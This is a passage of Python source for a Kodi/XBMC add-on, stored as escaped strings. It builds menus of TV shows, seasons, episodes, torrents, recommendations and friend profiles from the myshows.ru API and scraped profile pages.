\"argv\":{}},\n", " #{\"title\":TextBB('FULLSEASON', 'b'),\"mode\":\"12\", \"argv\":{}},]\n", "\n", " for i in menu:\n", " link=Link(i['mode'], i['argv'])\n", " h=Handler(int(sys.argv[1]), link)\n", " h.item(link, title=unicode(i['title']))\n", "\n", "\n", " for showId in jdata:\n", " if ruName=='true' and jdata[showId]['ruTitle']:\n", " title=jdata[showId]['ruTitle'].encode('utf-8')\n", " else:\n", " title=jdata[showId]['title']\n", "\n", " if mode not in (10,11,12,19):\n", " if mode!=18 and jdata[showId]['watchStatus']==\"watching\" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']==0:\n", " continue\n", " elif mode not in (13,17) and jdata[showId]['watchStatus']==\"watching\" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']!=0:\n", " continue\n", " elif mode!=14 and jdata[showId]['watchStatus']==\"later\":\n", " continue\n", " elif mode!=15 and jdata[showId]['watchStatus']==\"finished\":\n", " continue\n", " elif mode!=16 and jdata[showId]['watchStatus']==\"cancelled\":\n", " continue\n", "\n", " if mode==19:\n", " rating=int(jdata[showId]['watching'])\n", " else:\n", " rating=float(jdata[showId]['rating'])\n", " pre=prefix(showId=int(showId))\n", "\n", " item = xbmcgui.ListItem(pre+title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata[showId]['image']))\n", " info={'title': title, 'label':title, 'tvshowtitle': jdata[showId]['title'], 'rating': rating*2, 'votes':1, 'year': '', } #'playcount':jdata[showId]['watchedEpisodes'], 'episode':jdata[showId]['totalEpisodes'] НЕ ХОЧУ ГАЛКИ\n", " try:\n", " info['plot']=__language__(30265) % (str(jdata[showId]['watchedEpisodes']), str(jdata[showId]['totalEpisodes']))+'\\r\\n'+__language__(30266)+' '+str(rating)+'\\r\\n'\n", " except:info['plot']=''\n", " if syncshows: item=syncshows.shows(jdata[showId]['title'], item, info)\n", " else: item.setInfo( type='Video', infoLabels=info)\n", " stringdata={\"showId\":int(showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + str(showId) + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Seasons(showId):\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId)\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " saveCheckPoint()\n", " seasons, epdict=[], {}\n", " jdata = json.loads(data.get())\n", " for id in jdata['episodes']:\n", " seasonNumber=jdata['episodes'][id]['seasonNumber']\n", " if seasonNumber not in seasons:\n", " seasons.append(seasonNumber)\n", " epdict[str(jdata['episodes'][id]['seasonNumber'])]=str(jdata['episodes'][id]['id'])\n", " else:\n", " epdict[str(jdata['episodes'][id]['seasonNumber'])]=epdict[str(jdata['episodes'][id]['seasonNumber'])]+','+str(jdata['episodes'][id]['id'])\n", " seasons.sort()\n", " watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/')\n", " try:watched_jdata = json.loads(watched_data.get())\n", " except: watched_jdata=None\n", " ratedict={}\n", " if watched_jdata:\n", " epdict=sortcomma(epdict, watched_jdata)\n", " ratedict=RateShow(int(showId),watched_jdata).seasonrates()\n", "\n", " info={'label':jdata['title'], 'year':jdata['year']}\n", " meta, banners = None, []\n", " if syncshows and useTVDB: meta, banners = syncshows.episodes_meta(info)\n", " for sNumber in seasons:\n", " pre=prefix(showId=int(showId), seasonId=int(sNumber))\n", " title=pre+__language__(30138)+' '+str(sNumber)\n", " stringdata={\"showId\":int(showId), \"seasonId\":int(sNumber), \"episodeId\":None, \"id\":None}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(showId) + '&seasonNumber=' + str(sNumber) + '&mode=25'\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='')\n", " if epdict[str(sNumber)]=='': playcount=1\n", " else: playcount=0\n", " votes=1\n", " if ratedict.has_key(str(sNumber)): rating, votes=ratedict[str(sNumber)][0]*2,ratedict[str(sNumber)][1]\n", " else:rating=0\n", " info={'title': title, 'label':jdata['title'], 'season':int(sNumber), 'playcount': playcount, 'rating': rating, 'votes':votes, 'year':jdata['year']}\n", " if syncshows:\n", " item=syncshows.episodes(jdata['title'], item, info, meta)\n", " if banners:\n", " banner=season_banner(banners, int(sNumber))\n", " if banner: item.setThumbnailImage(banner)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", "\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url))\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Episodes(showId, seasonNumber):\n", " #lockView('info')\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId)\n", " watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/')\n", " jdata = json.loads(data.get())\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " saveCheckPoint()\n", " try:watched_jdata = json.loads(watched_data.get())\n", " except: watched_jdata=[]\n", " fanart=None\n", " if syncshows:\n", " info={'label':jdata['title'], 'year':jdata['year']}\n", " fanart=syncshows.episode_fanart(info)\n", "\n", " for id in jdata['episodes']:\n", " if jdata['episodes'][id]['seasonNumber']==int(seasonNumber):\n", " if id in watched_jdata:\n", " playcount=1\n", " if watched_jdata[id]['rating']:\n", " rating=float(watched_jdata[id]['rating'])\n", " else: rating=0\n", " else:\n", " playcount=0\n", " rating=0\n", " pre=prefix(showId=int(showId),seasonId=jdata['episodes'][id]['seasonNumber'], id=int(id), stype=None, episodeNumber=jdata['episodes'][id]['episodeNumber'])\n", " if not pre and syncshows.episode(jdata['title'], jdata['episodes'][id]['seasonNumber'], jdata['episodes'][id]['episodeNumber']): pre='[B][XBMC][/B]'\n", " title=pre+jdata['episodes'][id]['title']+' ['+jdata['episodes'][id]['airDate']+']'\n", " item = xbmcgui.ListItem('%s. %s' % (str(jdata['episodes'][id]['episodeNumber']), title), iconImage=str(jdata['episodes'][id]['image']), thumbnailImage=str(jdata['episodes'][id]['image']))\n", " item.setInfo( type='Video', infoLabels={'Title': title,\n", " 'year': jdata['year'],\n", " 'episode': jdata['episodes'][id]['episodeNumber'],\n", " 'season': jdata['episodes'][id]['seasonNumber'],\n", " 'tracknumber': jdata['episodes'][id]['sequenceNumber'],\n", " 'playcount': playcount,\n", " 'rating': rating*2,\n", " 'tvshowtitle': jdata['title'],\n", " 'premiered': jdata['started'],\n", " 'status': jdata['status'],\n", " 'code': jdata['imdbId'],\n", " 'aired': jdata['episodes'][id]['airDate'],\n", " 'plot': __language__(30266)+' '+str(rating),\n", " 'votes': jdata['voted']} )\n", " stringdata={\"showId\":int(showId), \"episodeId\":jdata['episodes'][id]['episodeNumber'], \"id\":int(id), \"seasonId\":jdata['episodes'][id]['seasonNumber']}\n", " if fanart: item.setProperty('fanart_image', fanart)\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&seasonNumber='+seasonNumber+'&showId='+showId+'&episodeId='+str(jdata['episodes'][id]['episodeNumber'])+'&id=' + str(id) + '&playcount=' + str(playcount) + '&mode=30'\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url))\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " sys_url=sys_url+refresh_url\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False)\n", "\n", "def EpisodeMenu(id, playcount, refresh_url):\n", " if change_onclick=='true':\n", " xbmc.executebuiltin(\"Action(ToggleWatched)\")\n", " Change_Status_Episode(showId, id, action, playcount, refresh_url)\n", " else:\n", " xbmc.executebuiltin(\"Action(ContextMenu)\")\n", "\n", "def MyTorrents():\n", " myt=TorrentDB()\n", " if sort!='shows' and showId==None:\n", " menu=[{\"title\":TextBB(__language__(30114), 'b'), \"mode\":\"50\", \"argv\":{'sort':'shows'}},\n", " {\"title\":TextBB(__language__(30287), 'b'), \"mode\":\"52\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30140), 'b'), \"mode\":\"51\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30141), 'b'), \"mode\":\"510\", \"argv\":{}}]\n", " for i in menu:\n", " link=Link(i['mode'], i['argv'])\n", " h=Handler(int(sys.argv[1]), link)\n", " h.item(link, title=unicode(i['title']))\n", "\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()\n", " jdata = json.loads(data)\n", "\n", " if sort=='shows':\n", " showlist=[]\n", " listdict=myt.get_all()\n", " for x in listdict:\n", " try:\n", " str_showId=str(x['showId'])\n", " try:\n", " if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle']\n", " else: show_title=jdata[str_showId]['title']\n", " except KeyError: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title']\n", " title=show_title\n", " if str_showId not in showlist:\n", " showlist.append(str_showId)\n", " item = xbmcgui.ListItem(title+' (%s)'%(str(myt.countshowId(str_showId))), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': title } )\n", " stringdata={\"showId\":x['showId'], \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&sort=&showId='+str_showId+'&mode=50'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", " except:\n", " Debug('[MyTorrents] Something went wrong with showId %s' % (str_showId), True)\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n", " else:\n", " if showId==None: listdict=myt.get_all()\n", " else: listdict=myt.get_all(showId=int(showId))\n", "\n", " for x in listdict:\n", " try:\n", " str_showId=str(x['showId'])\n", " str_seasonId=str(x['seasonId'])\n", " str_episodeId=str(x['episodeId'])\n", " str_id=str(x['id'])\n", " str_filename=unicode(x['filename'])\n", " try:\n", " if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle']\n", " else: show_title=jdata[str_showId]['title']\n", " except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title']\n", " title=''\n", " if prefix(stype=x['stype']): title=prefix(stype=x['stype'])\n", "\n", " if str_seasonId!='None': title=title+' S'+int_xx(str_seasonId)\n", " if str_episodeId!='None': title=title+'E'+int_xx(str_episodeId)\n", " title+=' '+show_title\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': title } )\n", " stringdata={\"showId\":x['showId'], \"episodeId\":x['episodeId'], \"id\":x['id'], \"seasonId\":x['seasonId']}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&id='+str_id+'&mode=3020'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False)\n", " except:\n", " Debug('[MyTorrents] Something went wrong with %s' % (str({\"showId\":x['showId'], \"episodeId\":x['episodeId'], \"id\":x['id'], \"seasonId\":x['seasonId']})), True)\n", "\n", "def MyScanList():\n", " myscan=ScanDB()\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()\n", " jdata = json.loads(data)\n", " listdict=myscan.get_all()\n", " for x in listdict:\n", " str_showId=str(x['showId'])\n", " str_seasonId=str(x['seasonId'])\n", " str_filename=unicode(x['filename'])\n", " try:\n", " if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle']\n", " else: show_title=jdata[str_showId]['title']\n", " except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title']\n", " ifstat=myscan.isfilename(str_filename)\n", " if ifstat: title=TextBB('+', 'b')\n", " else: title=TextBB('-', 'b')\n", " if prefix(stype=x['stype']): title+=prefix(stype=x['stype'])\n", " if str_seasonId!='None': title+=' S'+int_xx(str_seasonId)\n", " title+=' '+show_title\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': title } )\n", " stringdata={\"showId\":x['showId'], \"episodeId\":x['episodeId'], \"id\":x['id'], \"seasonId\":x['seasonId']}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&mode=3020'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url, ifstat), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False)\n", "\n", "def TopShows(action):\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " if action!='tvdb':saveCheckPoint()\n", " useTVDBtop=getSettingAsBool('tvdbtop')\n", " if action=='all':\n", " for i in [(__language__(30109),'male'),(__language__(30110),'female'),(__language__(30151),'recomm'),(__language__(30152),'friends'),(__language__(30156),'xbmcfriends'),(__language__(30155),'tvdb')]:\n", " item = xbmcgui.ListItem(TextBB(i[0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': unicode(i[0])} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=100' %(sys.argv[0], i[1])), listitem=item, isFolder=True)\n", " elif action in ['recomm','friends','xbmcfriends']:\n", " Recommendations(action)\n", " return\n", " elif action=='tvdb':\n", " if not useTVDBtop:\n", " dialog = xbmcgui.Dialog()\n", " ok=dialog.yesno(__language__(30519),__language__(30517),__language__(30518))\n", " if ok:\n", " __settings__.setSetting('tvdb','true')\n", " __settings__.setSetting('tvdbtop','true')\n", " gotoCheckPoint()\n", " return\n", "\n", " tdata=Data(cookie_auth, 'http://api.myshows.ru/shows/top/'+action+'/')\n", " get_data= tdata.get().lstrip('[{').rstrip('}]').split('},{')\n", " syncshows=False\n", " if useTVDBtop:\n", " try: syncshows=SyncXBMC()\n", " except: pass\n", "\n", " for data in get_data:\n", " jdata=json.loads('{'+data+'}')\n", " if ruName=='true' and jdata['ruTitle']:\n", " title=jdata['ruTitle'].encode('utf-8')\n", " else:\n", " title=jdata['title']\n", "\n", " info={'title': title,'year': jdata['year'],'tvshowtitle': jdata['title'],\n", " 'status': jdata['status'],'votes': jdata['voted'],'rating': float(jdata['rating'])*2}\n", " item = xbmcgui.ListItem(str(jdata['place'])+'. '+title+' ('+str(jdata['year'])+')', iconImage='DefaultFolder.png', thumbnailImage=str(jdata['image']))\n", " if syncshows: item=syncshows.shows(title, item, info)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", "\n", " stringdata={\"showId\":int(jdata['id']), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(jdata['id']) + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Recommendations(action):\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " saveCheckPoint()\n", " result=[]\n", " login=__settings__.getSetting(\"username\")\n", " if action=='xbmcfriends':\n", " action='friends'\n", " login='xbmchub'\n", " if action=='recomm':\n", " orig_before=u' <p class=\"description\">'\n", " orig_after=u'</p> </th>'\n", " orig_false=u' </th>'\n", " subject=Data(cookie_auth, 'http://myshows.ru/profile/recommendations/').get().decode('utf-8')\n", " reobj = re.compile(u'<span class=\"status .+?\"><a href=.+?/view/(\\d+?)/\">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style=\"width: (\\d+)%\"></div>.+?<td>(\\d+)%</td>', re.DOTALL | re.MULTILINE)\n", " result = reobj.findall(subject)\n", " elif action=='friends':\n", " orig_before=u'\t\t\t\t\t\t\t<p class=\"description\">'\n", " orig_after=u'</p>\t\t\t\t\t\t</th>'\n", " orig_false=u' </th>'\n", " subject=Data(cookie_auth, 'http://myshows.ru/'+login+'/friends/rating').get().decode('utf-8')\n", " reobj = re.compile(u'<span class=\"status .+?\"><a href=.+?/view/(\\d+?)/\">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style=\"width: (\\d+)%\"></div>.+?<td width=\"\\d+?%\">(\\d+)</td>.+?<td width=\"\\d+?%\">([0-9.]+)%</td>', re.DOTALL | re.MULTILINE)\n", " result = reobj.findall(subject)\n", " j=0\n", " for i in result:\n", " j+=1\n", " if action=='recomm':\n", " showId,title,origtitle,rating,recomm=i[0],i[1],i[2],i[3],i[4]\n", " listtitle=str(j)+'. ['+recomm+'%] '+title\n", " elif action=='friends':\n", " showId,title,origtitle,rating,friends,recomm=i[0],i[1],i[2],i[3],i[4],i[5]\n", " listtitle=str(j)+'. ['+friends+']['+recomm+'%] '+title\n", " if origtitle==orig_false: origtitle=title.encode('utf-8')\n", " else: origtitle=origtitle.replace(orig_before,'').replace(orig_after,'')\n", " title=title.encode('utf-8')\n", " if ruName!='true': title=origtitle\n", "\n", " rating=float(rating)/10\n", " item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',)\n", " info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':''}\n", " if syncshows: item=syncshows.shows(title, item, info)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", " stringdata={\"showId\":int(showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def EpisodeList(action):\n", " saveCheckPoint()\n", " item = xbmcgui.ListItem(' '+__language__(30114), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': __language__(30114), 'date': today_str()} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str(sys.argv[0] + '?action='+action+'&sort=shows&mode='+str(mode)), listitem=item, isFolder=True)\n", "\n", " show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/')\n", " data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/')\n", " show_jdata = json.loads(show_data.get())\n", " jdata = json.loads(data.get())\n", "\n", " for id in jdata:\n", " str_showId=str(jdata[id][\"showId\"])\n", " try:\n", " show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get())\n", " try:show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())\n", " show_title=show_direct['title']\n", " show_jdata[str_showId]=show_direct\n", " if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle']\n", " pre=prefix(id=int(id))\n", " left=dates_diff(str(jdata[id][\"airDate\"]), 'today')\n", " title=pre+(__language__(30113) % (int_xx(str(jdata[id]['seasonNumber'])), int_xx(str(jdata[id]['episodeNumber'])), left, show_title, jdata[id]['title']))\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=show_jdata[ str_showId ]['image'] )\n", " item.setInfo( type='Video', infoLabels={'title': title,\n", " 'episode': jdata[id]['episodeNumber'],\n", " 'season': jdata[id]['seasonNumber'],\n", " 'date': jdata[id]['airDate'] } )\n", " stringdata={\"showId\":int(str_showId), \"episodeId\":int(jdata[id]['episodeNumber']), \"id\":int(id), \"seasonId\":int(jdata[id]['seasonNumber'])}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str_showId + '&id='+str(id)+'&seasonNumber=' + str(jdata[id]['seasonNumber']) + '&playcount=0&mode=30'\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(data.url))\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url+refresh_url, listitem=item, isFolder=False)\n", "\n", "def ShowList(action):\n", " show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/')\n", " data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/')\n", " show_jdata = json.loads(show_data.get())\n", " jdata = json.loads(data.get())\n", "\n", " num_eps=dict()\n", " last_date=dict()\n", " first_date=dict()\n", " shows=dict()\n", " images=dict()\n", "\n", " for id in jdata:\n", " str_showId=str(jdata[id][\"showId\"])\n", " str_date=str(jdata[id][\"airDate\"])\n", " try:\n", " show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get())\n", " try:show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())\n", " show_title=show_direct['title']\n", " show_jdata[str_showId]=show_direct\n", " if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle']\n", " if num_eps.get(str_showId)==None:\n", " num_eps[str_showId]=1\n", " shows[str_showId]=show_title.encode('utf-8')\n", " last_date[str_showId]=str_date\n", " first_date[str_showId]=str_date\n", " images[str_showId]=show_jdata[str_showId]['image']\n", " else: num_eps[str_showId]=int(num_eps[str_showId])+1\n", "\n", " if fdate_bigger_ldate(last_date[str_showId],str_date)==False: last_date[str_showId]=str_date\n", " elif fdate_bigger_ldate(first_date[str_showId],str_date)==True: first_date[str_showId]=str_date\n", "\n", " for str_showId in num_eps:\n", " if num_eps[str_showId]==1:\n", " title=__language__(30115).encode('utf-8') % (last_date[str_showId], shows[str_showId], num_eps[str_showId])\n", " else:\n", " title=__language__(30116).encode('utf-8') % (last_date[str_showId], first_date[str_showId], shows[str_showId], num_eps[str_showId])\n", "\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(images[str_showId]) )\n", " item.setInfo( type='Video', infoLabels={'Title': shows[str_showId], 'date': str(last_date[str_showId]) } )\n", " stringdata={\"showId\":int(str_showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(show_data.url))\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + str_showId + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def FriendsNews():\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " i=[(__language__(30158),''),(__language__(30157),'xbmchub')]\n", " if action==None:\n", " first=1\n", " cookie_auth=__settings__.getSetting(\"cookie_auth\")\n", " else:\n", " first=0\n", " cookie_auth=auth_xbmc()\n", " item = xbmcgui.ListItem(TextBB(i[first][0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'title': unicode(i[0])} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=40' %(sys.argv[0], i[first][1])), listitem=item, isFolder=True)\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/').get()\n", " jfr, avatars=json.loads(data), {}\n", " for i in jfr[\"friends\"]:\n", " avatars[i[\"login\"]]=i[\"avatar\"]+\"0\"\n", " get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/')\n", " jx=json.loads(get_data)\n", " for u in jx:\n", " for jdata in jx[u]:\n", " if jdata['gender']=='m': title_str=__language__(30117)\n", " else: title_str=__language__(30118)\n", " if jdata['episodeId']>0:\n", " title=__language__(30119) % (jdata['login'], title_str, str(jdata['episode']), jdata['show'])\n", " else:\n", " title=__language__(30120) % (jdata['login'], title_str, str(jdata['episodes']), jdata['show'])\n", " try:item = xbmcgui.ListItem(title, iconImage=avatars[jdata[\"login\"]], thumbnailImage=avatars[jdata[\"login\"]])\n", " except:item = xbmcgui.ListItem(title, iconImage='', thumbnailImage='')\n", " info={'title': jdata['show'],'label': jdata['show'],'tvshowtitle': jdata['show'],'year':''}\n", " if syncshows: item=syncshows.shows(title, item, info, avatar=True)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?showId=' + str(jdata['showId'])+'&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " sys_url=sys.argv[0] + '?action=' + jdata['login'] + '&mode=41'\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Profile(action, sort='profile'):\n", " data= Data(cookie_auth, 'http://api.myshows.ru/profile/'+action).get()\n", " jdata=json.loads(data)\n", "\n", " if sort!='profile':\n", " flist=[]\n", " if sort!='friend':\n", " if sort=='friends':\n", " if 'friends' in jdata:\n", " flist=jdata['friends']\n", " elif sort=='followers':\n", " if 'followers' in jdata:\n", " flist=jdata['followers']\n", " for arr in flist:\n", " if arr['gender']=='m': title_str=__language__(30121)\n", " else: title_str=__language__(30122)\n", " days=arr['wastedTime']/24\n", " title=__language__(30123) % (arr['login'], title_str, str(days), str(arr['wastedTime']))\n", " avatar=arr['avatar']+'0'\n", " item = xbmcgui.ListItem(title, iconImage=avatar, thumbnailImage=avatar)\n", " item.setInfo( type='Video', infoLabels={'Title': title })\n", " sys_url=sys.argv[0] + '?action=' + arr['login'] + '&mode=41&sort=profile'\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", " elif action:\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " orig_before=u' <p class=\"description\">'\n", " orig_after=u'</p> </th>'\n", " orig_false=u' </th>'\n", " subject=Data(cookie_auth, 'http://myshows.ru/'+action+'/wasted').get().decode('utf-8')\n", " reobj = re.compile(r'<span class=\"status .+?\"><a href=\"http://myshows.ru/view/(\\d+)/\">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?.+?<div style=\"width: (\\d+)%\"></div>.+?<td>\\d+</td>.+?<td>(\\d+)</td>.+?<td>(.+?)</td>', re.DOTALL | re.MULTILINE)\n", " result = reobj.findall(subject)\n", " result=sorted(result, key=lambda x: x[1])\n", " result=sorted(result, key=lambda x: int(x[3]), reverse=True)\n", " for i in result:\n", " showId,title,origtitle,rating,totalep,epunwatched=i[0],i[1],i[2],i[3],i[4],i[5]\n", " if origtitle==orig_false:\n", " origtitle=title.encode('utf-8')\n", " else:\n", " origtitle=origtitle.replace(orig_before,'').replace(orig_after,'')\n", " #Debug(origtitle)\n", " if ruName!='true': title=origtitle\n", " title=title.encode('utf-8')\n", " rating=float(rating)/10\n", " epunwatched=epunwatched.replace('<span class=\"useless\">','').replace('</span>','')\n", " if int(epunwatched)==0: playcount=1\n", " else: playcount=0\n", " listtitle='[%d] %s' %(int(rating)/2, title)\n", " item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',)\n", " info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':'', 'playcount':playcount, 'episode':int(totalep)}\n", " if syncshows: item=syncshows.shows(title, item, info)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", " stringdata={\"showId\":int(showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", " else:\n", "\n", " if action==login:\n", " menu=[(__language__(30154),sys.argv[0] + '?mode=41&sort=friend&action='+login),\n", " (__language__(30124),sys.argv[0] + '?mode=41&sort=friends'),\n", " (__language__(30125),sys.argv[0] + '?mode=41&sort=followers')]\n", " elif sort!='friend':\n", " action=unicode(urllib.unquote_plus(action),'utf-8','ignore')\n", " menu=[(__language__(30154), sys.argv[0] + '?action='+action+'&mode=41&sort=friend'),\n", " (__language__(30127) % (action), sys.argv[0] + 